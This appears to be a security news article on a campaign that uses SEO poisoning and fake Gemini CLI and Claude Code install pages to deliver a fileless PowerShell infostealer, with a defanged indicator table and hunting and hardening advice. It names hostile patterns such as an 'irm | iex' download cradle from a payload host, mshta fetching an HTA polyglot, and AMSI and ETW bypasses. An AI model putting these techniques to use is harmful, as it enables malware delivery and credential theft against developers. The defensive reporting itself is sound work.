Financially motivated threat actors are running an active campaign that impersonates Google’s Gemini CLI and Anthropic’s Claude Code, using SEO poisoning to deliver a fileless PowerShell infostealer to developer workstations worldwide.
First identified in early March 2026 by EclecticIQ researchers, the campaign represents a calculated escalation in supply-chain-focused eCrime targeting AI developer tooling.
The infection begins with a routine developer web search. Attackers use black-hat SEO techniques keyword stuffing, private link networks, and artificial click inflation to surface attacker-controlled domains above legitimate vendor results.
SEO Poisoning to Impersonate
Victims searching for “Gemini CLI” land on the typosquatted domain geminicli[.]co[.]com, while Claude Code users are redirected to claudecode[.]co[.]com, both registered to leverage the .co.com suffix to appear legitimate.
A separate but overlapping campaign tracked by Reseachers, dubbed InstallFix, distributed near-identical fake Claude Code installation pages exclusively through Google Ads sponsored results, meaning attackers paid to appear at the top of search results.
Researchers confirmed attacks against government, electronics, education, and food and beverage sectors across the Americas, Asia-Pacific, Europe, and AMEA.
The social engineering lure is disarmingly simple: a visually cloned installation page instructs the developer to paste a single PowerShell command into their terminal. What makes this technique effective is the first-stage script’s simultaneous dual execution, EclecticIQ said.
While a concealed Shell.Application COM object silently fetches and memory-executes the second-stage infostealer from gemini-setup[.]c[.]com via irm | iex, the same script runs the legitimate npm install -g @google/gemini-cli in the visible terminal giving the victim.
For the Claude Code variant, EclecticIQ telemetry observed mshta.exe being invoked against download-version[.]1-5-8[.]com, fetching a ZIP/HTA polyglot file (claude.msixbundle) that contained genuine Microsoft Bing packages bearing valid signatures alongside an appended malicious HTA payload a dual-format structure specifically designed to evade static detection.
The second-stage PowerShell payload immediately disables Event Tracing for Windows (ETW) and bypasses AMSI before initiating collection.
A ~6,800-line obfuscated script with an anti-sandbox qemu-ga check then harvests credentials across a broad surface: Chrome, Edge, Brave, and Firefox login data; session tokens from Slack, Teams, Discord, Zoom, and Telegram; WinSCP, PuTTY, and OpenVPN configurations; cloud-synced directories from OneDrive, Google Drive, MEGA, and Proton Drive; and OAuth tokens, SSH keys, and CI/CD credentials.
Stolen session cookies from collaboration platforms bypass MFA entirely, feeding the access broker market with immediate resale value.
EclecticIQ’s passive DNS pivot from the campaign’s bulletproof host at 109.107.170[.]111 (Netherlands-based MIRhosting) uncovered a cluster of 30+ domains also impersonating Node.js, Chocolatey, KeePassXC, and Monero indicating the threat actor rotates only the lure brand and C2 hostname.
The campaign appears geographically focused on the United States and United Kingdom based on observed .us.com, .us.org, and .co.uk TLD patterns.
Indicators of Compromise
| Indicator | Type | Source |
|---|---|---|
| geminicli[.]co[.]com | Lure domain | EclecticIQ |
| gemini-setup[.]com | Payload host | EclecticIQ |
| events[.]msft23[.]com | Gemini C2 | EclecticIQ |
| claudecode[.]co[.]com | Lure domain | EclecticIQ / Push Security |
| claude-setup[.]com | Payload host | EclecticIQ |
| events[.]ms709[.]com | Claude C2 | EclecticIQ |
| download-version[.]1-5-8[.]com | Payload host | Trend Micro |
| oakenfjrod[.]ru | Stage-4 C2 | Trend Micro |
| 109.107.170[.]111 | Bulletproof host IP | EclecticIQ |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Security teams should hunt for irm | iex download cradle patterns in command-line telemetry and alert on powershell.exe spawned with -WindowStyle Hidden .
Organizations should enforce PowerShell Constrained Language Mode via WDAC or AppLocker, deploy FIDO2 keys for privileged developer accounts, and configure browser policies to prevent clipboard write access on untrusted sites .
Developer awareness training addressing paste-and-execute social engineering particularly for AI tool installation workflows is the most immediate preventive control available .
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
